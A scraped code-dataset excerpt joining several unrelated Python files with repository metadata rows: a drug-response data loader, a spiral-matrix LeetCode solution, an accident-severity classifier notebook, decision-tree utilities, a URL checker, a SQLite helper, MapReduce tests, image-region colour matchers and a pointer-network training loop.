model = build_model(self.conv0, self.doses, self.timeV, self.expTable)
samples = pm.sample(model=model, **fitKwargs)
self.df = pm.backends.tracetab.trace_to_dataframe(samples)
def __init__(self, loadFile, comb=None, interval=True):
"""Import experimental data"""
# Property list
properties = {"confl": "_confluence_phase.csv", "apop": "_confluence_green.csv", "dna": "_confluence_red.csv"}
# Find path for csv files in the repository.
pathcsv = join(dirname(abspath(__file__)), "data/singles/" + loadFile)
# Pull out selected column data
self.doses = []
self.drugs = []
selconv0 = []
# Get dict started
self.expTable = dict()
# Read in both observation files. Return as formatted pandas tables.
# Data tables to be kept within class.
for key, value in properties.items():
# Read input file
dataset = pandas.read_csv(pathcsv + value)
# Subtract control
dataset1 = dataset.iloc[:, 2: len(dataset.columns)]
dataset1.sub(dataset1["Control"], axis=0)
data = pandas.concat([dataset.iloc[:, 0:2], dataset1], axis=1, sort=False)
# If interval=False, filter for endpoint data
if not interval:
# Keep data within an hour of the beginning or end
data = data.loc[(data["Elapsed"] < 1.0) | (max(data["Elapsed"]) - data["Elapsed"] < 1.0)]
# Get phase confl was t=0 for confl_conv calculation
if key == "confl":
conv0 = np.mean(data.loc[data["Elapsed"] == 0].iloc[:, 2:])
# Set the time vector
self.timeV = data.iloc[:, 1].values
assert len(data.columns) > 3
for col in range(2, len(data.columns)):
# Set the name of the condition we're considering
condName = data.columns.values[col]
# For data with combination therapies
if comb is not None:
# Represent dose with a tuple of len(2) in each case
# If control
if "Control" in condName:
drug = "Control"
dose = (0, 0)
# If only the combination drug
elif condName.split(" ")[0] == comb:
drug = comb
dose = (0, float(condName.split(" ")[1]))
# If contains drug besides the combination drug
elif "blank" not in condName.lower():
try: # Both combination drug and another drug
drug1str = condName.split(", ")[0]
combstr = condName.split(", ")[1]
dose = (float(drug1str.split(" ")[1]), float(combstr.split(" ")[1]))
drug = drug1str.split(" ")[0] + "+" + combstr.split(" ")[0]
except IndexError: # Only the other drug
drug = condName.split(" ")[0]
dose = (condName.split(" ")[1], 0)
# Add data to expTable
self.expTable.setdefault(key, []).append(data.iloc[:, col].values)
# Append to class variables once per column of data
if key == "confl":
self.drugs.append(drug)
self.doses.append(dose)
selconv0.append(conv0[col - 2])
else: # For data without combinations
if "blank" not in condName.lower():
# Add the name of the condition we're considering
try:
drug = condName.split(" ")[0]
dose = condName.split(" ")[1]
except IndexError:
drug = "Control"
dose = 0
# Add data to expTable
self.expTable.setdefault(key, []).append(data.iloc[:, col].values)
# Append to class variables once per column of data
if key == "confl":
self.drugs.append(drug)
self.doses.append(dose)
selconv0.append(conv0[col - 2])
# Reshape experimental data into 1D array
self.expTable[key] = np.array(self.expTable[key]).reshape((-1,))
# Record averge conv0 for confl prior
self.conv0 = np.mean(selconv0)
| true |
f1faf4010a554b17696fe9aaa28c217c5fe3847a | Python | blackwings001/algorithm | /leetcode/51-100/_54_spiralOrder.py | UTF-8 | 1,681 | 3.625 | 4 | [] | no_license | class Solution(object):
def spiralOrder(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[int]
"""
result = []
if matrix == []:
return result
i = 0 # 第几圈,每圈的起点是matrix[i][i]
cur_row = len(matrix) # 第i圈的行数
cur_col = len(matrix[0]) # 第i圈的列数
while True:
# 定位该圈四个点的横纵坐标, 只需要对角两个点的坐标即可
row1 = i
row2 = i + cur_row - 1
col1 = i
col2 = i + cur_col - 1
if cur_row >= 2 and cur_col >= 2:
result.extend([matrix[row1][j] for j in range(col1, col2)]) # 使用列表表达式添加元素,matrix[row1:row2][col1]这种方式是错的
result.extend([matrix[i][col2] for i in range(row1, row2)])
result.extend([matrix[row2][j] for j in range(col2, col1, -1)])
result.extend([matrix[i][col1] for i in range(row2, row1, -1)])
cur_row -= 2
cur_col -= 2
i += 1
continue
elif cur_col == 0 or cur_row == 0:
return result
elif cur_row == 1:
# 只有一行的情况
result.extend([matrix[row1][j] for j in range(col1, col2 + 1)])
elif cur_col == 1:
# 只有一列的情况
result.extend([matrix[i][col2] for i in range(row1, row2 + 1)])
return result
if __name__ == '__main__':
solution = Solution()
result = solution.spiralOrder([[3],[2]])
print(result) | true |
11335239bcd4b5345e640e3a131202c1cf589972 | Python | teejaytanmay/Road-Accident-Severity | /Road_Accident_Severity.py | UTF-8 | 6,387 | 2.625 | 3 | [
"MIT"
] | permissive |
# coding: utf-8
# In[70]:
import numpy as np
import pandas as pd
#Visualisation Libraries
import matplotlib.pyplot as plt
get_ipython().magic(u'matplotlib inline')
import warnings
warnings.filterwarnings('ignore')
import seaborn as sns
from pandas.plotting import scatter_matrix
#Training and Preprocessing Libraries
from xgboost import XGBClassifier
from imblearn.ensemble import EasyEnsembleClassifier
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import roc_auc_score
import pickle
# In[71]:
class_names = ['Fatal', 'Severe', 'Slight']
# In[72]:
data= pd.read_csv("accidentva.csv")
# In[73]:
def max_val(s):
is_max = s == s.max()
return ['background-color: yellow' if v else '' for v in is_max]
year_wise_casualties = data.groupby(['Year'])['Number_of_Casualties'].sum()
year_wise_casualties = year_wise_casualties.reset_index()
year_wise_casualties = year_wise_casualties.style.apply(max_val, axis=0)
year_wise_casualties
# In[74]:
cas_table = data.groupby(['Day_of_Week']).agg({'Number_of_Casualties':['sum'],'Speed_limit':['min','max']})
cas_table = cas_table.sort_values([('Number_of_Casualties','sum')],ascending=False)
cas_table = cas_table.reset_index()
cas_table.style.apply(max_val)
# In[75]:
corr_matrix = data.corr()
corr_matrix["Accident_Severity"].sort_values(ascending=False)
# In[76]:
data.hist(bins=50, figsize=(20,15))
plt.show()
# In[77]:
fig = data.plot(kind="scatter", x="Longitude", y="Latitude", alpha=0.6,
figsize=(18,11),c="Accident_Severity", cmap=plt.get_cmap("inferno"),
colorbar=True,)
# In[78]:
attributes = ["Number_of_Vehicles","Number_of_Casualties", "Time", "Road_Type", "Pedestrian_Crossing-Human_Control", "Pedestrian_Crossing-Physical_Facilities", "Light_Conditions", "Weather_Conditions", "Road_Surface_Conditions","Accident_Severity"]
scatter_matrix(data[attributes], figsize=(10, 10))
# In[79]:
def preprocessing(data):
#Drop useless columns and nan values
data.drop(['Police_Force', 'Junction_Detail', 'Junction_Control', 'Special_Conditions_at_Site', 'Carriageway_Hazards', 'Did_Police_Officer_Attend_Scene_of_Accident', 'LSOA_of_Accident_Location', 'Local_Authority_(District)', 'Local_Authority_(Highway)'], axis=1, inplace=True)
data.dropna(inplace=True)
#Drop rows with 'Unknown' values
data = data[data.Weather_Conditions!='Unknown']
data = data[data.Road_Type!='Unknown']
#Encode "String" Labels into "Int" Labels for easy training
le = LabelEncoder()
data["Pedestrian_Crossing-Physical_Facilities"]= le.fit_transform(data["Pedestrian_Crossing-Physical_Facilities"])
data["Light_Conditions"]= le.fit_transform(data["Light_Conditions"])
data["Weather_Conditions"] = le.fit_transform(data["Weather_Conditions"])
data["Road_Surface_Conditions"] = le.fit_transform(data["Road_Surface_Conditions"])
data["Pedestrian_Crossing-Human_Control"] = le.fit_transform(data["Pedestrian_Crossing-Human_Control"])
data["Road_Type"] = le.fit_transform(data["Road_Type"])
#Converting Time into Int for easy training
data["Time"]= data["Time"].astype(str)
data['Time']=data['Time'].str.slice(0,2, 1)
data["Time"]= data["Time"].astype(int)
#Creating 3 additional columns, one each for each class we need to classify into
onehot = pd.get_dummies(data.Accident_Severity,prefix=['Severity'])
data["Fatal"] = onehot["['Severity']_1"]
data["Severe"] = onehot["['Severity']_2"]
data["Slight"] = onehot["['Severity']_3"]
#Finally splitting the data into train and test
train,test = train_test_split(data,test_size=.25)
return (train,test)
# In[80]:
train,test = preprocessing(data)
# In[81]:
train_features = train[["Number_of_Vehicles","Number_of_Casualties", "Day_of_Week", "Time", "Road_Type", "Speed_limit", "Pedestrian_Crossing-Human_Control", "Pedestrian_Crossing-Physical_Facilities", "Light_Conditions", "Weather_Conditions", "Road_Surface_Conditions","Year", "Urban_or_Rural_Area"]]
test_features =test[["Number_of_Vehicles","Number_of_Casualties", "Day_of_Week", "Time", "Road_Type", "Speed_limit", "Pedestrian_Crossing-Human_Control", "Pedestrian_Crossing-Physical_Facilities", "Light_Conditions", "Weather_Conditions", "Road_Surface_Conditions","Year", "Urban_or_Rural_Area"]]
# In[ ]:
def model():
scores = []
acc_score=[]
fat_weights = [0.3 for i in range(train["Fatal"].shape[0])]
sev_weights = [0.5 for i in range(train["Severe"].shape[0])]
sli_weights = [1 for i in range(train["Slight"].shape[0])]
class_weights={"Fatal":fat_weights,"Severe":sev_weights,"Slight":sli_weights}
submission = pd.DataFrame.from_dict({'Accident_Index': test['Accident_Index']})
for class_name in class_names:
train_target = train[class_name]
classifier = EasyEnsembleClassifier(n_estimators=12, base_estimator=XGBClassifier(max_depth=4, learning_rate=0.2, n_estimators=600, silent=True,
subsample = 0.8,
gamma=0.5,
min_child_weight=10,
objective='binary:logistic',
colsample_bytree = 0.6,
max_delta_step = 1,
nthreads=1,
n_jobs=1))
cv_score = np.mean(cross_val_score(
classifier, train_features, train_target, cv=3, scoring='roc_auc'))
scores.append(cv_score)
# print('CV score for class {} is {}'.format(class_name, cv_score))
classifier.fit(train_features, train_target, sample_weight = class_weights[class_name])
submission[class_name] = classifier.predict_proba(test_features)[:, 1]
acc = roc_auc_score(test[class_name],submission[class_name])
acc_score.append(acc)
# print('Mean accuracy for class {} is {}'.format(class_name,acc))
#Pickling the model
model_pkl = open('Accident_Severity_Prediction_Model_Pkl.pkl','ab')
pickle.dump(classifier,model_pkl)
model_pkl.close()
return (scores,acc_score)
cv,acc = model()
# In[ ]:
print('Total CV score is {}'.format(np.mean(cv)))
print('Total accuracy score is {}'.format(np.mean(acc)))
| true |
c6373d839c57dbdcc4efb916873f7ce6ff6372d0 | Python | JiaweiD/DecisionTree | /trees.py | UTF-8 | 7,366 | 3.09375 | 3 | [] | no_license | import operator
from math import log
#calculate Shannon Entrophy of a dataset
def calcShannonEnt(dataSet):
numEntries = len(dataSet)
labelCounts = {}
for featVec in dataSet:
currentLabel = featVec[-1]
if currentLabel not in labelCounts.keys():
labelCounts[currentLabel] = 0
labelCounts[currentLabel] += 1
shannonEnt = 0.0
for key in labelCounts:
prob = float(labelCounts[key])/numEntries
shannonEnt -= prob * log(prob,2)
return shannonEnt
#split a dataset by a certain value of a certain axis
def splitDataSet(dataSet,axis,value):
retDataSet = []
for featVec in dataSet:
if featVec[axis] == value:
reducedFeatVec = featVec[:axis]
reducedFeatVec.extend(featVec[axis+1:])
retDataSet.append(reducedFeatVec)
return retDataSet
#choose the best feature to split by information gain
def chooseBestFeatureToSplitByGain(dataSet):
numFeatures = len(dataSet[0])-1
baseEntrophy = calcShannonEnt(dataSet)
bestInfoGain = 0.0; bestFeature = -1
for i in range(numFeatures):
featList = [example[i] for example in dataSet]
uniqueVals = set(featList)
newEntrophy = 0.0
for value in uniqueVals:
subDataSet = splitDataSet(dataSet,i,value)
prob = len(subDataSet)/float(len(dataSet))
newEntrophy += prob * calcShannonEnt(subDataSet)
infoGain = baseEntrophy - newEntrophy
if (infoGain > bestInfoGain):
bestInfoGain = infoGain
bestFeature = i
return bestFeature
#choose the best feature to split by information gain(when dealing with continuous attributes)
def chooseBestContinuousFeatureToSplitByGain(dataSet):
numFeatures = len(dataSet[0])-1
baseEntrophy = calcShannonEnt(dataSet)
bestInfoGain = 0.0
bestAttrInfoGain = 0.0
bestFeature = -1
bestAttrValue = 0
for i in range(numFeatures):
featList = [example[i] for example in dataSet]
midPointList = [(float(featList[i])+float(featList[i+1]))/2 for i in range(len(featList)-1)]
newEntrophy = 0.0
for value in midPointList:
subDataSetLess = []
subDataSetMore = []
for dataVec in dataSet:
if float(dataVec[i]) < value:
reducedVec = dataSet[:i]
reducedVec.extend(dataSet[i+1:])
subDataSetLess.extend(reducedVec)
else:
reducedVec = dataSet[:i]
reducedVec.extend(dataSet[i + 1:])
subDataSetMore.extend(reducedVec)
probLess = len(subDataSetLess)/float(len(dataSet))
probMore = len(subDataSetMore)/float(len(dataSet))
attrEntrophy = probLess * calcShannonEnt(subDataSetLess) + probMore * calcShannonEnt(subDataSetMore)
attrInfoGain = baseEntrophy - attrEntrophy
if attrInfoGain > bestAttrInfoGain:
bestAttrInfoGain = attrInfoGain
bestAttrValue = value
newEntrophy = attrInfoGain
infoGain = baseEntrophy - newEntrophy
if (infoGain > bestInfoGain):
bestInfoGain = infoGain
bestFeature = i
return bestFeature
#choose the best feature to split by information gain ratio(C4.5)
def chooseBestFeatureToSplitByGainRatio(dataSet):
numFeatures = len(dataSet[0])-1
baseEntrophy = calcShannonEnt(dataSet)
bestInfoGainRatio = 0.0; bestFeature = -1
for i in range(numFeatures):
featList = [example[i] for example in dataSet]
uniqueVals = set(featList)
newEntrophy = 0.0
valuesOfAttributeI = {}
IntrinsicValue = 0
for value in featList:
if value not in valuesOfAttributeI:
valuesOfAttributeI.setdefault(value,0)
valuesOfAttributeI[value]+=1
for key in valuesOfAttributeI:
IntrinsicValue-=valuesOfAttributeI[key]/len(featList)*log(valuesOfAttributeI[key]/len(featList),2)
for value in uniqueVals:
subDataSet = splitDataSet(dataSet,i,value)
prob = len(subDataSet)/float(len(dataSet))
newEntrophy += prob * calcShannonEnt(subDataSet)
infoGain = baseEntrophy - newEntrophy
infoGainRatio = infoGain/IntrinsicValue
if (infoGainRatio > bestInfoGainRatio):
bestInfoGainRatio = infoGainRatio
bestFeature = i
return bestFeature
#calculate the gini index of a dataset
def calcGini(dataSet):
numEntries = len(dataSet)
labelCounts = {}
for featVec in dataSet:
currentLabel = featVec[-1]
if currentLabel not in labelCounts.keys():
labelCounts[currentLabel] = 0
labelCounts[currentLabel] += 1
gini = 1.0
for key in labelCounts:
prob = float(labelCounts[key]) / numEntries
gini -= prob**2
return gini
#choose the best feature to split by gini index(CART)
def chooseBestFeatureToSplitByGini(dataSet):
numFeatures = len(dataSet[0])-1
bestGiniIndex = 99999; bestFeature = -1
for i in range(numFeatures):
featList = [example[i] for example in dataSet]
uniqueVals = set(featList)
newGiniIndex = 0.0
for value in uniqueVals:
subDataSet = splitDataSet(dataSet,i,value)
prob = len(subDataSet)/float(len(dataSet))
newGiniIndex += prob * calcGini(subDataSet)
if (newGiniIndex < bestGiniIndex):
bestGiniIndex = newGiniIndex
bestFeature = i
return bestFeature
#deciding the classification of the leaf nodes by voting
def majorityCnt(classList):
classCount = {}
for vote in classList:
if vote not in classCount.keys():classCount[vote] = 0
classCount[vote] += 1
sortedClassCount = sorted(classCount.items(),key = operator.itemgetter(1),reverse=True)
return sortedClassCount[0][0]
#create a decision tree
def createTree(dataSet,labels):
classList = [example[-1] for example in dataSet]
if classList.count(classList[0]) == len(classList):
return classList[0]
if len(dataSet[0]) == 1:
return majorityCnt(classList)
bestFeat = chooseBestFeatureToSplitByGain(dataSet)
bestFeatLabel = labels[bestFeat]
myTree = {bestFeatLabel:{}}
del labels[bestFeat]
featValues = [example[bestFeat] for example in dataSet]
uniqueVals = set(featValues)
for value in uniqueVals:
subLabels = labels[:]
myTree[bestFeatLabel][value] = createTree(splitDataSet(dataSet,bestFeat,value),subLabels)
return myTree
#classifying function when testing
def classify(inputTree,featLabels,testVec):
firstStr = list(inputTree.keys())[0]
secondDict = inputTree[firstStr]
featIndex = featLabels.index(firstStr)
for key in secondDict.keys():
if testVec[featIndex] == key:
if type(secondDict[key]).__name__=='dict':
classLabel = classify(secondDict[key],featLabels,testVec)
else: classLabel = secondDict[key]
return classLabel
#store trees
def storeTree(inputTree,filename):
import pickle
fw = open(filename,'wb')
pickle.dump(inputTree,fw)
fw.close()
def grabTree(filename):
import pickle
fr = open(filename,'rb')
print(pickle.load(fr))
| true |
da7413af6b68f35a9f45552c7ecfc5262d0c8476 | Python | riverxieh/ariadne | /ariadne/matchers/visual_matchers.py | UTF-8 | 11,746 | 2.796875 | 3 | [] | no_license | import math
import numpy as np
import skimage.color
from scipy.stats import multivariate_normal
from scipy.stats import norm
import cv2
class VisualMatcher(object):
def __init__(self, ariadne):
self.ariadne = ariadne
def computeCost(self, n1, n2):
return 0.0
class SimpleColorMatcher(VisualMatcher):
def __init__(self, ariadne):
super(SimpleColorMatcher, self).__init__(ariadne)
def computeCost(self, n1, n2):
node1 = self.ariadne.graph.node(n1)
node2 = self.ariadne.graph.node(n2)
return np.linalg.norm(node1['mean color'] - node2['mean color'])
class LabHistogramMatcher(VisualMatcher):
def __init__(self, ariadne, bins=[8, 8, 8], precompute_histograms=False):
super(LabHistogramMatcher, self).__init__(ariadne)
self.bins = bins
self.max_distance = math.sqrt(np.sum(np.array(bins).ravel()))
self.histogram_map = {}
if precompute_histograms:
nodes = self.ariadne.graph.nodes()
for i, n in enumerate(nodes):
region = self.ariadne.graph.region(n)
histo = self.regionHistogram(region)
self.histogram_map[region] = histo
print("Histogram percentage", 100.0 *
float(i) / float(len(nodes)))
def regionHistogram(self, region):
if region in self.histogram_map:
return self.histogram_map[region]
colors_list = []
coords = region['coords']
for p1 in coords:
color = self.ariadne.image[p1[0], p1[1], :]
# colors.append(color)
color_lab = skimage.color.rgb2lab(color.reshape((1, 1, 3)))
colors_lab.append(color_lab)
# colors = np.array(colors)
colors_lab = np.array(colors_lab).reshape((len(coords), 3))
l = colors_lab[:, 0]
a = colors_lab[:, 1]
b = colors_lab[:, 2]
hl, _ = np.histogram(l, self.bins[0], range=(0, 100.0))
ha, _ = np.histogram(a, self.bins[1], range=(-127., 128.))
hb, _ = np.histogram(b, self.bins[2], range=(-127., 128.))
hl = np.array(hl).astype(float)
ha = np.array(ha).astype(float)
hb = np.array(hb).astype(float)
hl = hl / np.max(hl)
ha = ha / np.max(ha)
hb = hb / np.max(hb)
histo = np.concatenate((hl, ha, hb))
self.histogram_map[region] = histo
return histo
def computeCost(self, n1, n2):
node1 = self.ariadne.graph.node(n1)
node2 = self.ariadne.graph.node(n2)
r1 = self.ariadne.graph.region(n1)
r2 = self.ariadne.graph.region(n2)
h1 = self.regionHistogram(r1)
h2 = self.regionHistogram(r2)
return np.linalg.norm(h1 - h2) / self.max_distance
# return np.linalg.norm(node1['mean color'] - node2['mean color'])
class PathVisualMatcher(object):
def __init__(self, ariadne, path):
self.ariadne = ariadne
self.path = path
def computePDF(self, n1):
return 0.0
class PathLabHistogramMatcher(PathVisualMatcher):
def __init__(self, ariadne, path, bins=[8, 8, 8], precompute_histograms=False):
super(PathLabHistogramMatcher, self).__init__(ariadne, path)
self.bins = bins
self.max_distance = math.sqrt(np.sum(np.array(bins).ravel()))
self.histogram_map = {}
if precompute_histograms:
nodes = self.ariadne.graph.nodes()
for i, n in enumerate(nodes):
region = self.ariadne.graph.region(n)
histo = self.regionHistogram(region)
self.histogram_map[region] = histo
# print(histo)
print("Histogram percentage", 100.0 *
float(i) / float(len(nodes)))
def regionHistogram(self, region):
if region in self.histogram_map:
return self.histogram_map[region]
colors_lab = []
coords = region['coords']
for p1 in coords:
color = self.ariadne.image[p1[0], p1[1], :]
# colors.append(color)
color_lab = skimage.color.rgb2lab(color.reshape((1, 1, 3)))
colors_lab.append(color_lab)
# colors = np.array(colors)
colors_lab = np.array(colors_lab).reshape((len(coords), 3))
l = colors_lab[:, 0]
a = colors_lab[:, 1]
b = colors_lab[:, 2]
hl, _ = np.histogram(l, self.bins[0], range=(0, 100.0))
ha, _ = np.histogram(a, self.bins[1], range=(-127., 128.))
hb, _ = np.histogram(b, self.bins[2], range=(-127., 128.))
# print("HISTOGRAMSSSSS", hl, ha, hb)
hl = hl / float(len(coords))
hb = hb / float(len(coords))
ha = ha / float(len(coords))
hl = np.array(hl).astype(float)
ha = np.array(ha).astype(float)
hb = np.array(hb).astype(float)
# print("HISTOGRAMSSSSS ** ", hl, ha, hb)
histo = np.concatenate((hl, ha, hb))
self.histogram_map[region] = histo
return histo
def computePDF(self, n2):
if self.path.size() == 0:
return 1.0
r1 = self.ariadne.graph.region(self.path.last_node)
r2 = self.ariadne.graph.region(n2)
h1 = self.regionHistogram(r1)
h2 = self.regionHistogram(r2)
mn = multivariate_normal(h1)
return mn.pdf(h2)
# return np.linalg.norm(node1['mean color'] - node2['mean color'])
class ColorPathHistogramMatcher(PathVisualMatcher):
DESCRIPTOR_CEILAB = "DESCRIPTOR_CEILAB"
DESCRIPTOR_BALLARD = "DESCRIPTOR_BALLARD"
def __init__(self, ariadne, path, bins=[8, 8, 8], precompute_histograms=False, descriptor="DESCRIPTOR_CEILAB",instogram_intersection=True,single_part_normalization=False):
super(ColorPathHistogramMatcher, self).__init__(ariadne, path)
self.bins = bins
self.max_distance = math.sqrt(np.sum(np.array(bins).ravel()))
self.histogram_map = {}
self.descriptor = descriptor
self.histogram_intersection = instogram_intersection
self.single_part_normalization = single_part_normalization
if precompute_histograms:
nodes = self.ariadne.graph.nodes()
for i, n in enumerate(nodes):
region = self.ariadne.graph.region(n)
histo = self.regionHistogram(region)
self.histogram_map[region] = histo
# print(histo)
print("Histogram percentage", 100.0 *
float(i) / float(len(nodes)))
def colorFeature(self, color_input):
if self.descriptor == ColorPathHistogramMatcher.DESCRIPTOR_CEILAB:
return skimage.color.rgb2lab(color_input.reshape((1, 1, 3)))
elif self.descriptor == ColorPathHistogramMatcher.DESCRIPTOR_BALLARD:
ballard = np.array([
color_input[0]+color_input[1]+color_input[2],
color_input[0]-color_input[1],
2.0*color_input[2]-color_input[0]-color_input[1]
])
return ballard
def colorFeatureRange(self):
if self.descriptor == ColorPathHistogramMatcher.DESCRIPTOR_CEILAB:
return [(0, 100.0),(-127., 128.),(-127., 128.)]
elif self.descriptor == ColorPathHistogramMatcher.DESCRIPTOR_BALLARD:
return [(0.0,3.0),(-1.0,1.0),(-2.0,2.0)]
def regionHistogram(self, region):
if region in self.histogram_map:
return self.histogram_map[region]
colors_list = []
coords = region['coords']
for p1 in coords:
color = self.ariadne.image[p1[0], p1[1], :]
# colors.append(color)
#color_lab = skimage.color.rgb2lab(color.reshape((1, 1, 3)))
colors_list.append(self.colorFeature(color))
# colors = np.array(colors)
colors_list = np.array(colors_list).reshape((len(coords), 3))
l = colors_list[:, 0]
a = colors_list[:, 1]
b = colors_list[:, 2]
ranges = self.colorFeatureRange()
hl, _ = np.histogram(l, self.bins[0], range=ranges[0])
ha, _ = np.histogram(a, self.bins[1], range=ranges[1])
hb, _ = np.histogram(b, self.bins[2], range=ranges[2])
# print("HISTOGRAMSSSSS", hl, ha, hb)
if self.single_part_normalization:
hl = hl / float(len(coords))
hb = hb / float(len(coords))
ha = ha / float(len(coords))
hl = np.array(hl).astype(float)
ha = np.array(ha).astype(float)
hb = np.array(hb).astype(float)
# print("HISTOGRAMSSSSS ** ", hl, ha, hb)
histo = np.concatenate((hl, ha, hb))
self.histogram_map[region] = histo
return histo
def return_intersection(self,hist_1, hist_2):
minima = np.minimum(hist_1, hist_2)
intersection = np.true_divide(np.sum(minima), np.sum(hist_2))
return intersection
def computePDF(self, n2):
if self.path.size() == 0:
return 1.0
r1 = self.ariadne.graph.region(self.path.last_node)
r2 = self.ariadne.graph.region(n2)
h1 = self.regionHistogram(r1)
h2 = self.regionHistogram(r2)
mn = multivariate_normal(h1)
if self.histogram_intersection:
return self.return_intersection(h1,h2)
else:
return mn.pdf(h2)
# return np.linalg.norm(node1['mean color'] - node2['mean color'])
class Color2DHistogramMatcher(PathVisualMatcher):
DESCRIPTOR_CEILAB = "DESCRIPTOR_CEILAB"
DESCRIPTOR_BALLARD = "DESCRIPTOR_BALLARD"
def __init__(self, ariadne, bins=[32,32], precompute_histograms=False, descriptor="DESCRIPTOR_CEILAB",instogram_intersection=True,single_part_normalization=False):
super(Color2DHistogramMatcher, self).__init__(ariadne, None)
self.img = (ariadne.image * 255.0).astype(np.uint8)
self.img = cv2.cvtColor(self.img, cv2.COLOR_RGB2BGR)
self.hsv = cv2.cvtColor(self.img, cv2.COLOR_RGB2HSV)
self.h, self.s, self.v = cv2.split(self.hsv)
self.bins = bins
self.max_distance = math.sqrt(np.sum(np.array(bins).ravel()))
self.histogram_map = {}
self.descriptor = descriptor
self.histogram_intersection = instogram_intersection
self.single_part_normalization = single_part_normalization
# if precompute_histograms:
# nodes = self.ariadne.graph.nodes()
# for i, n in enumerate(nodes):
# region = self.ariadne.graph.region(n)
# histo = self.regionHistogram(region)
# self.histogram_map[region] = histo
# # print(histo)
# print("Histogram percentage", 100.0 *
# float(i) / float(len(nodes)))
def regionHistogram(self, n):
hist = cv2.calcHist(
[self.hsv],
[0, 1],
self.ariadne.graph.maskImage(n),
[32, 32],
[0, 180, 0, 256]
)
hist = hist / np.sum(hist.ravel())
return hist
def histogramComparison(self,h1, h2):
return cv2.compareHist(h1, h2, cv2.HISTCMP_INTERSECT)
#return cv2.compareHist(h1, h2, cv2.HISTCMP_BHATTACHARYYA)
def compare(self, n1,n2):
h1 = self.regionHistogram(n1)
h2 = self.regionHistogram(n2)
return self.histogramComparison(h1,h2)
def normalizeComparison(self,current_value,max_value):
dx = math.fabs(current_value-max_value)
delta = 0.05
p1 = norm.pdf(dx+delta,scale=0.02)
p2 = norm.pdf(dx-delta,scale=0.02)
return (delta / 2.0) * (p1 + p2)
#return math.exp(-((current_value - max_value)**2.0)/(2*(0.2**2)))
| true |
b6154c000cb05d61825daddaa92f8794518fee21 | Python | SandyTaillan/projet-liens-web | /gestlien.py | UTF-8 | 2,448 | 2.640625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
#
import requests
import urllib3
class Gestionlienweb:
"""Cette classe regroupe toute la gestion des liens valides ou non."""
def veriflien(self, monurl, mondepre):
"""Vérification de la validité du lien."""
# déclaration des variables
# variable declaration
situation = ""
ajout_depre = 0
listhttp_1 = [201, 202, 203, 204, 205, 206, 207, 208, 210, 226]
try:
r = requests.get(monurl, timeout=7)
if r.status_code == requests.codes.ok:
situation = "tout va bien"
elif r.status_code in listhttp_1:
situation = "tout va bien"
except requests.exceptions.SSLError:
situation = "erreur: ssl"
ajout_depre = 10
except requests.exceptions.ConnectTimeout:
situation = "erreur: temps connection"
ajout_depre = 10
except requests.exceptions.InvalidSchema:
situation = "erreur: Schema invalid"
ajout_depre = 100
except requests.exceptions.ReadTimeout:
situation = "erreur: temps imparti"
ajout_depre = 10
except requests.exceptions.ProxyError:
situation = "erreur: proxy"
ajout_depre = 10
except requests.exceptions.HTTPError:
situation = "erreur: http"
ajout_depre = 10
except requests.exceptions.MissingSchema:
situation = "erreur: schéma manquant"
ajout_depre = 10
except requests.exceptions.InvalidURL:
situation = "erreur: url invalid"
ajout_depre = 50
except requests.exceptions.ConnectionError:
situation = "erreur: connection"
ajout_depre = 10
except requests.exceptions.TooManyRedirects:
situation = "erreur: Trop de redirection"
ajout_depre = 20
except requests.exceptions.RequestException:
situation = "erreur: erreur sur requests"
ajout_depre = 10
except urllib3.exceptions.DecodeError:
situation = "erreur: problème de décodage"
ajout_depre = 20
# except:
# situation = "Erreur: inconnue"
depreciation = mondepre + ajout_depre
print(f"la situation du lien est : {situation} avec une depréciation de {depreciation}")
return situation, depreciation
| true |
a21df85e0b695dc1714301a1f088f27c1adc6ef3 | Python | Homyakin/FlaskLab | /database/database.py | UTF-8 | 1,303 | 2.96875 | 3 | [] | no_license | import sqlite3
from sqlite3 import Error
def create_connection():
""" create a database connection to the SQLite database
specified by db_file
:return: Connection object or None
"""
conn = None
try:
conn = sqlite3.connect('app/data/data.db')
except Error as e:
print(e)
return conn
def get(conn, fields):
"""
:param conn: connection to database
:param fields: list of fields to get
:return: list of tuples with data from db
"""
cur = conn.cursor()
cur.execute(f'''
SELECT {', '.join(fields)} FROM INFO;
''')
return cur.fetchall()
def insert(conn, data: dict):
"""
:param conn: connection to database
:param data: словарь с данными
:return: last row id
"""
cur = conn.cursor()
sql = '''
INSERT INTO INFO(CityPopulation,
EmploymentField,
EmploymentStatus,
Gender,
HasDebt,
LanguageAtHome,
JobPref,
JobWherePref,
SchoolDegree,
MaritalStatus,
Income) VALUES(?,?,?,?,?,?,?,?,?,?,?);
'''
cur.execute(sql, list(data.values()))
return cur.lastrowid
| true |
a05ed819105a92ab482f3496765f236012e0f945 | Python | drkiettran/mapreduce-py | /test/WordCountMapper_test.py | UTF-8 | 807 | 3.015625 | 3 | [] | no_license | import unittest
from app.WordCountMapper import WordCountMapper
from test.IOUtil import StringIO
import sys
class TestWordCountMapper(unittest.TestCase):
def setUp(self):
self.mapper = WordCountMapper()
self.captured_output = StringIO()
sys.stdout = self.captured_output
def tearDown(self):
sys.stdout = sys.__stdout__
def test_process_line(self):
words = self.mapper.proc_line("abcdef.; -abc xyz-abd ad? efr;")
self.assertEqual(words, ['abcdef', 'abc', 'xyz', 'abd', 'ad', 'efr'])
def test_map(self):
sys.stdin = StringIO("abcdef.; -abc xyz-abd ad? efr;")
self.mapper.map()
sys.stdout = sys.__stdout__
self.assertTrue('abcdef\t1\nabc\t1\nxyz\t1\nabd\t1\nad\t1\nefr\t1' in self.captured_output.getvalue())
| true |
81a260a480f85da67d8f8b3459571313471f6d41 | Python | zaidhassanch/PointerNetworks | /T007_gen_words_spacy_vectors/main.py | UTF-8 | 1,805 | 2.703125 | 3 | [] | no_license | import torch.optim as optim
from generateData import batch
import config
import time
from pointerNetwork import PointerNetwork
import torch
import torch.nn as nn
import time
BATCH_SIZE = 32
EPOCHS = 10
STEPS_PER_EPOCH = 100
def train(pNet, optimizer, epoch, clip=1.):
"""Train single epoch"""
print('Epoch [{}] -- Train'.format(epoch))
#x, y, t = batch(BATCH_SIZE)
start = time.time()
for step in range(STEPS_PER_EPOCH):
optimizer.zero_grad()
x, y, t = batch(BATCH_SIZE)
# Forward
out, loss = pNet(x, y)
# Backward
loss.backward()
nn.utils.clip_grad_norm_(pNet.parameters(), clip)
optimizer.step()
